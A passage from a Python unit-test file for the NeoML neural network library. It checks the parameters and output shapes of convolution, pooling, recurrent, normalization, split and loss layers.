self.assertEqual(layer.filter_count, 17)
self.assertEqual(conv.filter_size, (6, 6))
self.assertEqual(layer.filter_size, (6, 6))
conv.filter_size = (3, 3)
self.assertEqual(conv.filter_size, (3, 3))
self.assertEqual(conv.stride_size, (7, 7))
conv.stride_size = (2, 2)
self.assertEqual(conv.stride_size, (2, 2))
self.assertEqual(conv.padding_size, (8, 8))
conv.padding_size = (1, 1)
self.assertEqual(conv.padding_size, (1, 1))
self.assertEqual(conv.dilation_size, (9, 9))
conv.dilation_size = (1, 1)
self.assertEqual(conv.dilation_size, (1, 1))
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (2, 3, 4, 9, 9, 17))
self.assertEqual(out2.shape, (2, 3, 4, 9, 9, 17))
def test_channelwise_conv(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.ChannelwiseConv((source1, source2), 16, (6, 6), (7, 7), (8, 8), False, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
conv.filter_count = 17
self.assertEqual(conv.filter_count, 17)
self.assertEqual(layer.filter_count, 17)
self.assertEqual(conv.filter_size, (6, 6))
self.assertEqual(layer.filter_size, (6, 6))
conv.filter_size = (3, 3)
self.assertEqual(conv.filter_size, (3, 3))
self.assertEqual(conv.stride_size, (7, 7))
conv.stride_size = (2, 2)
self.assertEqual(conv.stride_size, (2, 2))
self.assertEqual(conv.padding_size, (8, 8))
conv.padding_size = (1, 1)
self.assertEqual(conv.padding_size, (1, 1))
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5, 7), dtype=np.float32), (2, 3, 4, 5, 5, 1, 7))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5, 7), dtype=np.float32), (2, 3, 4, 5, 5, 1, 7))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (2, 3, 4, 3, 3, 7))
self.assertEqual(out2.shape, (2, 3, 4, 3, 3, 7))
def test_time_conv(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.TimeConv((source1, source2), 16, 6, 7, 8, 19, 9, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
conv.filter_count = 8
self.assertEqual(conv.filter_count, 8)
self.assertEqual(layer.filter_count, 8)
self.assertEqual(conv.filter_size, 6)
self.assertEqual(layer.filter_size, 6)
conv.filter_size = 3
self.assertEqual(conv.filter_size, 3)
self.assertEqual(conv.padding_front, 7)
conv.padding_front = 2
self.assertEqual(conv.padding_front, 2)
self.assertEqual(conv.padding_back, 8)
conv.padding_back = 2
self.assertEqual(conv.padding_back, 2)
self.assertEqual(layer.padding_back, 2)
self.assertEqual(conv.stride, 9)
conv.stride = 3
self.assertEqual(conv.stride, 3)
self.assertEqual(conv.dilation, 19)
self.assertEqual(layer.dilation, 19)
conv.dilation = 5
self.assertEqual(conv.dilation, 5)
input1 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 3, 3), dtype=np.float32), (9, 3, 1, 3, 3, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 3, 3), dtype=np.float32), (9, 3, 1, 3, 3, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (3, 8))
self.assertEqual(out2.shape, (3, 8))
def test_conv3d(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.Conv3D((source1, source2), 16, (8, 6, 2), (9, 7, 2), (8, 8, 4), False, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
self.assertEqual(layer.filter_count, 16)
conv.filter_count = 7
self.assertEqual(conv.filter_count, 7)
self.assertEqual(conv.filter_size, (8, 6, 2))
conv.filter_size = (4, 3, 2)
self.assertEqual(conv.filter_size, (4, 3, 2))
self.assertEqual(layer.filter_size, (4, 3, 2))
self.assertEqual(conv.stride_size, (9, 7, 2))
conv.stride_size = (2, 2, 3)
self.assertEqual(conv.stride_size, (2, 2, 3))
self.assertEqual(conv.padding_size, (8, 8, 4))
conv.padding_size = (2, 1, 1)
self.assertEqual(conv.padding_size, (2, 1, 1))
input1 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (9, 3, 5, 3, 2, 7))
self.assertEqual(out2.shape, (9, 3, 5, 3, 2, 7))
def test_transposedconv3d(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.TransposedConv3D((source1, source2), 16, (8, 6, 2), (9, 7, 2), (8, 8, 4), False, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
self.assertEqual(layer.filter_count, 16)
conv.filter_count = 7
self.assertEqual(conv.filter_count, 7)
self.assertEqual(conv.filter_size, (8, 6, 2))
conv.filter_size = (4, 3, 2)
self.assertEqual(conv.filter_size, (4, 3, 2))
self.assertEqual(layer.filter_size, (4, 3, 2))
self.assertEqual(conv.stride_size, (9, 7, 2))
conv.stride_size = (2, 2, 3)
self.assertEqual(conv.stride_size, (2, 2, 3))
self.assertEqual(conv.padding_size, (8, 8, 4))
conv.padding_size = (2, 1, 1)
self.assertEqual(conv.padding_size, (2, 1, 1))
input1 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((9, 3, 8, 6, 4), dtype=np.float32), (9, 3, 1, 8, 6, 4, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (9, 3, 14, 11, 9, 7))
self.assertEqual(out2.shape, (9, 3, 14, 11, 9, 7))
def test_depthtospace(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
depth_to_space = neoml.Dnn.DepthToSpace(source, block_size=3, name='depth_to_space')
sink = neoml.Dnn.Sink(depth_to_space, 'sink')
self.assertEqual(depth_to_space.name, 'depth_to_space')
self.assertEqual(depth_to_space.block_size, 3)
depth_to_space.block_size = 2
self.assertEqual(depth_to_space.block_size, 2)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 5, 4, 8, 12), dtype=np.float32), (2, 3, 5, 4, 8, 1, 12))
outputs = dnn.run({'source' : input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 5, 8, 16, 3))
def test_spacetodepth(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
space_to_depth = neoml.Dnn.SpaceToDepth(source, block_size=3, name='space_to_depth')
sink = neoml.Dnn.Sink(space_to_depth, 'sink')
self.assertEqual(space_to_depth.name, 'space_to_depth')
self.assertEqual(space_to_depth.block_size, 3)
space_to_depth.block_size = 2
self.assertEqual(space_to_depth.block_size, 2)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 5, 4, 8, 12), dtype=np.float32), (2, 3, 5, 4, 8, 1, 12))
outputs = dnn.run({'source' : input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 5, 2, 4, 48))
def test_lrn(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
lrn = neoml.Dnn.Lrn(source, window_size=3, bias=-2., alpha=0.456, beta=0.123, name='lrn')
sink = neoml.Dnn.Sink(lrn, 'sink')
self.assertEqual(lrn.name, 'lrn')
self.assertEqual(lrn.window_size, 3)
self.assertAlmostEqual(lrn.bias, -2., delta=1e-5)
self.assertAlmostEqual(lrn.alpha, 0.456, delta=1e-5)
self.assertAlmostEqual(lrn.beta, 0.123, delta=1e-5)
input_blob = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 6, 7, 8), dtype=np.float32), (2, 3, 4, 5, 6, 7, 8))
outputs = dnn.run({'source': input_blob})
out = outputs['sink'].asarray()
self.assertEqual(out.shape, (2, 3, 4, 5, 6, 7, 8))
def _test_cast_impl(self, type_from, type_to):
def generate_array(type):
np_type = np.float32 if type == 'float' else np.int32
return np.arange(5, dtype=np_type)
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, 'source')
cast = neoml.Dnn.Cast(source, output_type=type_to)
sink = neoml.Dnn.Sink(cast, 'sink')
input_arr = generate_array(type_from)
input_blob = neoml.Blob.asblob(math_engine, input_arr, (1, 1, 1, 1, 1, 1, len(input_arr)))
outputs = dnn.run({'source': input_blob})
actual = outputs['sink'].asarray()
expected = generate_array(type_to)
self.assertEqual(actual.dtype, expected.dtype)
self.assertTrue(np.equal(actual, expected).all())
def test_cast(self):
types = ['int', 'float']
for type_from in types:
for type_to in types:
self._test_cast_impl(type_from, type_to)
class PoolingTestCase(MultithreadedTestCase):
def _test_pooling(self, layer, init_params={}, changed_params={},
input_shape=(2, 1, 2, 3, 5, 4, 2)):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
pooling = getattr(neoml.Dnn, layer)(source, name="pooling", **init_params)
sink = neoml.Dnn.Sink(pooling, "sink")
layer = dnn.layers['pooling']
self.assertEqual(layer.name, 'pooling')
for k,v in init_params.items():
self.assertAlmostEqual(getattr(pooling, k), v, delta=1e-3,
msg='Initial param {} of {} differs'.format(k, layer))
self.assertEqual(getattr(pooling, k), getattr(layer, k))
for k,v in changed_params.items():
setattr(pooling, k, v)
self.assertAlmostEqual(getattr(pooling, k), v, delta=1e-3,
msg='Changed param {} of {} differs'.format(k, layer))
self.assertEqual(getattr(pooling, k), getattr(layer, k))
input = neoml.Blob.asblob(math_engine, np.ones(input_shape, dtype=np.float32), input_shape)
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
return out
def test_max_pooling(self):
out = self._test_pooling('MaxPooling',
dict(filter_size=(5, 5), stride_size=(3, 4)),
dict(filter_size=(2, 2), stride_size=(2, 1)))
self.assertTrue(np.equal(out, np.ones((2, 2, 4, 4, 2), dtype=np.float32)).all())
def test_mean_pooling(self):
out = self._test_pooling('MeanPooling',
dict(filter_size=(5, 5), stride_size=(3, 4)),
dict(filter_size=(2, 2), stride_size=(2, 1)))
self.assertTrue(np.equal(out, np.ones((2, 2, 4, 4, 2), dtype=np.float32)).all())
def test_max_pooling3d(self):
out = self._test_pooling('MaxPooling3D',
dict(filter_size=(5, 5, 5), stride_size=(3, 4, 5)),
dict(filter_size=(2, 2, 2), stride_size=(2, 1, 1)))
self.assertTrue(np.equal(out, np.ones((2, 2, 4, 3, 2), dtype=np.float32)).all())
def test_mean_pooling3d(self):
out = self._test_pooling('MeanPooling3D',
dict(filter_size=(5, 5, 5), stride_size=(3, 4, 5)),
dict(filter_size=(2, 2, 2), stride_size=(2, 1, 1)))
self.assertTrue(np.equal(out, np.ones((2, 2, 4, 3, 2), dtype=np.float32)).all())
def test_global_max_pooling(self):
out = self._test_pooling('GlobalMaxPooling',
dict(max_count=5),
dict(max_count=6))
self.assertTrue(np.equal(out, np.ones((2, 2, 6, 2), dtype=np.float32)).all())
def test_global_mean_pooling(self):
out = self._test_pooling('GlobalMeanPooling')
self.assertTrue(np.equal(out, np.ones((2, 2, 2), dtype=np.float32)).all())
def test_max_over_time_pooling(self):
out = self._test_pooling('MaxOverTimePooling',
dict(filter_len=3, stride_len=5),
dict(filter_len=2, stride_len=1))
self.assertTrue(np.equal(out, np.ones((2, 3, 5, 4, 2), dtype=np.float32)).all())
def test_projection_pooling(self):
out = self._test_pooling('ProjectionPooling',
dict(dimension="width", original_size=True),
dict(dimension="channels", original_size=False),
input_shape=(1, 2, 3, 5, 4, 1, 2))
self.assertTrue(np.equal(out, np.ones((2, 3, 5, 4), dtype=np.float32)).all())
def test_object_norm(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
norm = neoml.Dnn.ObjectNormalization(source1, 0.01, "norm")
sink = neoml.Dnn.Sink(norm, "sink")
layer = dnn.layers['norm']
self.assertEqual(layer.name, 'norm')
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 6), dtype=np.float32), (2, 3, 1, 4, 5, 1, 6))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertAlmostEqual(norm.epsilon, 0.01, delta=1e-3)
self.assertEqual(norm.epsilon, layer.epsilon)
norm.epsilon = 0.1
blob = neoml.Blob.asblob(math_engine, np.ones((4, 5, 6), dtype=np.float32), (1, 1, 1, 1, 1, 1, 120))
scale = norm.scale
norm.scale = blob
bias = norm.bias
norm.bias = blob
self.assertEqual(scale.shape, bias.shape)
self.assertEqual(a.shape, input1.shape)
def test_positional_embedding(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
pos = neoml.Dnn.PositionalEmbedding(source1, "transformers", "pos")
sink = neoml.Dnn.Sink(pos, "sink")
layer = dnn.layers['pos']
self.assertEqual(layer.name, 'pos')
input1 = neoml.Blob.asblob(math_engine, np.ones((3, 4, 6), dtype=np.float32), (1, 3, 4, 1, 1, 1, 6))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(pos.type, "transformers")
self.assertEqual(layer.type, "transformers")
pos.type = "learnable_addition"
blob = neoml.Blob.asblob(math_engine, np.ones((4, 5, 6), dtype=np.float32), (1, 1, 1, 1, 1, 1, 120))
addends = pos.addends
pos.addends = blob
self.assertEqual(a.shape, input1.shape)
def test_precision_recall(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
pre = neoml.Dnn.PrecisionRecall((source1, source2), False, "pre")
sink = neoml.Dnn.Sink(pre, "sink")
layer = dnn.layers['pre']
self.assertEqual(layer.name, 'pre')
self.assertEqual(pre.reset, False)
self.assertEqual(layer.reset, False)
pre.reset = True
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(pre.result, [24, 24, 0, 0])
self.assertEqual(layer.result, [24, 24, 0, 0])
self.assertEqual(a.size, 4)
def test_qrnn(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
qrnn = neoml.Dnn.Qrnn((source1, source2), 'fo', 7, 4, 2, (1, 1), "sigmoid", 0.6, "direct", "qrnn")
filter = neoml.Blob.asblob(math_engine, np.ones((21, 5, 6), dtype=np.float32), (1, 21, 1, 4, 1, 1, 6))
qrnn.filter = filter
free_term = neoml.Blob.asblob(math_engine, np.ones((21,), dtype=np.float32), (1, 21, 1, 1, 1, 1, 1))
qrnn.free_term = free_term
layer = dnn.layers['qrnn']
self.assertEqual(layer.name, 'qrnn')
sink = neoml.Dnn.Sink(qrnn, "sink")
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 6), dtype=np.float32), (2, 3, 1, 1, 1, 1, 6))
input2 = neoml.Blob.asblob(math_engine, np.ones((3, 7), dtype=np.float32), (1, 3, 1, 1, 1, 1, 7))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(qrnn.hidden_size, 7)
self.assertEqual(layer.hidden_size, 7)
self.assertEqual(qrnn.window_size, 4)
self.assertEqual(qrnn.stride, 2)
self.assertEqual(qrnn.padding_front, 1)
self.assertEqual(layer.padding_front, 1)
self.assertEqual(qrnn.padding_back, 1)
self.assertEqual(qrnn.activation, "sigmoid")
self.assertAlmostEqual(qrnn.dropout, 0.6, delta=1e-3)
self.assertEqual(qrnn.recurrent_mode, "direct")
self.assertEqual(a.shape, (1, 3, 1, 1, 1, 1, 7 ))
def test_reorg(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
reorg = neoml.Dnn.Reorg(source, 3, "reorg")
sink = neoml.Dnn.Sink(reorg, "sink")
layer = dnn.layers['reorg']
self.assertEqual(layer.name, 'reorg')
layer.stride = 2
self.assertEqual(reorg.stride, 2)
self.assertEqual(layer.stride, 2)
input1 = neoml.Blob.asblob(math_engine, np.ones((1, 3, 1, 8, 8, 1, 4), dtype=np.float32), (1, 3, 1, 8, 8, 1, 4))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"]
self.assertEqual(out.shape, (1, 3, 1, 4, 4, 1, 16))
def test_repeat_count(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
repeat_count = neoml.Dnn.RepeatSequence(source, 5, "layer")
sink = neoml.Dnn.Sink(repeat_count, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
self.assertEqual(repeat_count.repeat_count, 5)
self.assertEqual(layer.repeat_count, 5)
layer.stride = 6
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 1, 3, 2, 1, 1, 2), dtype=np.float32), (2, 1, 3, 2, 1, 1, 2))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, np.ones((10, 3, 2, 2), dtype=np.float32)).all())
def test_softmax(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
softmax = neoml.Dnn.Softmax(source, "list_size", "layer")
sink = neoml.Dnn.Sink(softmax, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
self.assertEqual(softmax.area, "list_size")
self.assertEqual(layer.area, "list_size")
layer.stride = "channels"
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 10), dtype=np.float32), (2, 1, 10, 1, 1, 1, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, 0.1 * np.ones((2, 10), dtype=np.float32)).all())
def test_split(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
split_types = ("SplitBatchLength", "SplitBatchWidth", "SplitListSize", "SplitHeight", "SplitWidth", "SplitDepth", "SplitChannels")
for i, split_name in enumerate(split_types):
split = getattr(neoml.Dnn, split_name)(source, (2, 3), split_name)
sink = neoml.Dnn.Sink((split, 0), "sink{}".format(2 * i))
sink = neoml.Dnn.Sink((split, 1), "sink{}".format(2 * i + 1))
arr = np.ones((5, 5, 5, 5, 5, 5, 5), dtype=np.float32)
input1 = neoml.Blob.asblob(math_engine, arr, (5, 5, 5, 5, 5, 5, 5))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
for i, split_name in enumerate(split_types):
expected1, expected2, _ = np.split(arr, (2, 3), i)
layer = dnn.layers[split_name]
self.assertEqual(layer.name, split_name)
out1 = outputs["sink{}".format(2 * i)].asarray()
out2 = outputs["sink{}".format(2 * i + 1)].asarray()
self.assertTrue(np.equal(out1, expected1).all())
self.assertTrue(np.equal(out2, expected2).all())
def test_sub_sequence(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
subsequence = neoml.Dnn.SubSequence(source, 1, 3, "layer")
reverse = neoml.Dnn.ReverseSequence(source, "layer2")
sink = neoml.Dnn.Sink(subsequence, "sink")
sink2 = neoml.Dnn.Sink(reverse, "sink2")
layer1 = dnn.layers['layer']
self.assertEqual(layer1.name, 'layer')
layer2 = dnn.layers['layer2']
self.assertEqual(layer2.name, 'layer2')
self.assertEqual(layer1.start_pos, 1)
subsequence.start_pos = 2
self.assertEqual(subsequence.start_pos, 2)
self.assertEqual(subsequence.length, 3)
subsequence.length = 2
self.assertEqual(layer1.length, 2)
input1 = neoml.Blob.asblob(math_engine, np.ones((5, 3, 4), dtype=np.float32), (5, 1, 3, 1, 4, 1, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out1 = outputs["sink"].asarray()
self.assertEqual(out1.shape, (2, 3, 4))
out2 = outputs["sink2"].asarray()
self.assertEqual(out2.shape, (5, 3, 4))
def test_upsampling2d(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
upsampling = neoml.Dnn.Upsampling2D(source, 4, 5, "layer")
sink = neoml.Dnn.Sink(upsampling, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
self.assertEqual(layer.height_copy_count, 4)
layer.height_copy_count = 2
self.assertEqual(upsampling.height_copy_count, 2)
self.assertEqual(upsampling.width_copy_count, 5)
upsampling.width_copy_count = 3
self.assertEqual(layer.width_copy_count, 3)
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 2), dtype=np.float32), (1, 2, 3, 1, 2, 1, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, np.ones((2, 3, 2, 6), dtype=np.float32)).all())
def test_transform(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
trans = [("set", 3), ("set", 1), ("set", 5), ("set", 4), ("divide", 4), ("multiply", 2), ("remainder", 4)]
transform = neoml.Dnn.Transform(source, trans, "layer")
sink = neoml.Dnn.Sink(transform, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
self.assertEqual(transform.transforms, trans)
self.assertEqual(layer.transforms, trans)
layer.transforms = trans
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 2, 3, 1, 4, 1, 5))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (3, 5, 4, 2))
def test_transpose(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
transpose = neoml.Dnn.Transpose(source, "height", "width", "layer")
sink = neoml.Dnn.Sink(transpose, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
self.assertEqual(transpose.first_dim, "height")
layer.first_dim = "depth"
self.assertEqual(layer.first_dim, "depth")
self.assertEqual(transpose.second_dim, "width")
layer.second_dim = "channels"
self.assertEqual(layer.second_dim, "channels")
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5), dtype=np.float32), (1, 2, 1, 2, 1, 5, 5))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, np.ones((2, 2, 5, 5), dtype=np.float32)).all())
def test_sequence_sum(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source1")
sequence_sum = neoml.Dnn.SequenceSum(source, "layer")
sink = neoml.Dnn.Sink(sequence_sum, "sink")
layer = dnn.layers['layer']
self.assertEqual(layer.name, 'layer')
input1 = neoml.Blob.asblob(math_engine, np.ones((5, 2, 2), dtype=np.float32), (5, 1, 1, 2, 1, 1, 2))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, [[5., 5.], [5., 5.]]).all())
def test_irnn(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
batch_length = 12
batch_width = 6
channels_in = 5
hidden_size = 10
identity_scale = 1e-1
input_weight_std = 1e-4
name = "irnn_test_name"
source = neoml.Dnn.Source(dnn, "source")
irnn = neoml.Dnn.Irnn(source, hidden_size, identity_scale, input_weight_std, True, name)
sink = neoml.Dnn.Sink(irnn, "sink")
layer = dnn.layers[name]
self.assertEqual(layer.name, name)
input1 = neoml.Blob.asblob(math_engine, np.ones((batch_length, batch_width, channels_in), dtype=np.float32),
(batch_length, batch_width, 1, 1, 1, 1, channels_in))
inputs = {"source": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(irnn.hidden_size, hidden_size)
self.assertEqual(layer.hidden_size, hidden_size)
self.assertAlmostEqual(irnn.identity_scale, identity_scale, delta=1e-5)
self.assertAlmostEqual(irnn.input_weight_std, input_weight_std, delta=1e-5)
self.assertEqual(a.shape, (batch_length, batch_width, 1, 1, 1, 1, hidden_size))
def test_indrnn(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
batch_length = 12
batch_width = 6
channels_in = 5
hidden_size = 10
dropout_rate = 0.5
reverse = True
activation = 'sigmoid'
name = "indrnn_test_name"
source = neoml.Dnn.Source(dnn, "source")
indrnn = neoml.Dnn.IndRnn(source, hidden_size, dropout_rate, reverse, activation, name)
sink = neoml.Dnn.Sink(indrnn, "sink")
layer = dnn.layers[name]
self.assertEqual(layer.name, name)
input1 = neoml.Blob.asblob(math_engine, np.ones((batch_length, batch_width, channels_in), dtype=np.float32),
(batch_length, batch_width, 1, 1, 1, 1, channels_in))
inputs = { "source" : input1 }
outputs = dnn.run(inputs)
a = outputs[sink.name]
self.assertEqual(indrnn.hidden_size, hidden_size)
self.assertEqual(layer.hidden_size, hidden_size)
self.assertAlmostEqual(indrnn.dropout_rate, dropout_rate, delta=1e-5)
self.assertEqual(indrnn.reverse_sequence, reverse)
self.assertEqual(indrnn.activation, activation)
class MulLossCalculator(neoml.Dnn.CustomLossCalculatorBase):
def calc(self, data, labels):
return neoml.AutoDiff.mul(data - labels, data - labels)
class BinaryCrossEntropyLossCalculator(neoml.Dnn.CustomLossCalculatorBase):
def calc(self, data, labels):
return neoml.AutoDiff.binary_cross_entropy(data, labels, True)
class LossTestCase(MultithreadedTestCase):
def _test_loss(self, layer, kwargs={},
n_classes=2,
labels_type=np.float32,
last_loss=0.):
shape = (2, 3, 1, 1, 1, 1, 1 if n_classes == 2 else n_classes)
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
source3 = neoml.Dnn.Source(dnn, "source3")
loss = getattr(neoml.Dnn, layer)((source1, source2, source3), name="loss", **kwargs)
layer = dnn.layers['loss']
self.assertEqual(layer.name, 'loss')
input1 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
input2 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=labels_type), shape)
input3 = neoml.Blob.asblob(math_engine, np.ones(shape, dtype=np.float32), shape)
inputs = {"source1": input1, "source2": input2, "source3": input3}
dnn.run(inputs)
for k,v in kwargs.items():
